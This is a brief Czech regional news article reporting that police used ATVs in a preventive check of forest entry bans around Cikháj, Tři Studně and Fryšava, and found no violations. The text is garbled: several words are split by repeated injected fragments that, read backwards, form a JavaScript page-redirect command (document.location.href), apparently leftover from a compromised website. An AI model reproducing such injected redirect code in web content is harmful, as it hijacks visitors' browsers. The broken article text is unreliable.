Rainbow page separator

Policisté na kontroly zákazů vjezdu do lesů nasadili čtyřkolky

Čtvrtek, 7. července 2022

Žďársko / Také policejní čtyřkolky, které se mnohem snadněji dostanou do méně přístupných míst v terénu Žďárských vrchů než au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily, využili policisté při preventivní kontrolní akci, jež byla zaměřena na prověření neoprávněných vjezdů mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristů do lesů.
„Ve spolupráci s Lesní správou Kinský, Lesy České republiky a CHKO Žďárské vrchy jsme kontrolovali dodržování zejména zákazu vjezdu mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel na lesní účelové komunikace a do lesních porostů v okolí obcí Cikháj, Tři Studně a Fryšava pod Žákovou horou,“ upřesnila územní rozsah kontrol policejní mluvčí Dana Čírtková s tím, že ačkoliv policisté občas přijímají oznámení týkající se porušování zákazů vjezdu ve zmíněných lokalitách mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tocyklisty jezdícími po lesních cestách, při mimořádné preventivní akci žádné porušení zákona nezjistili.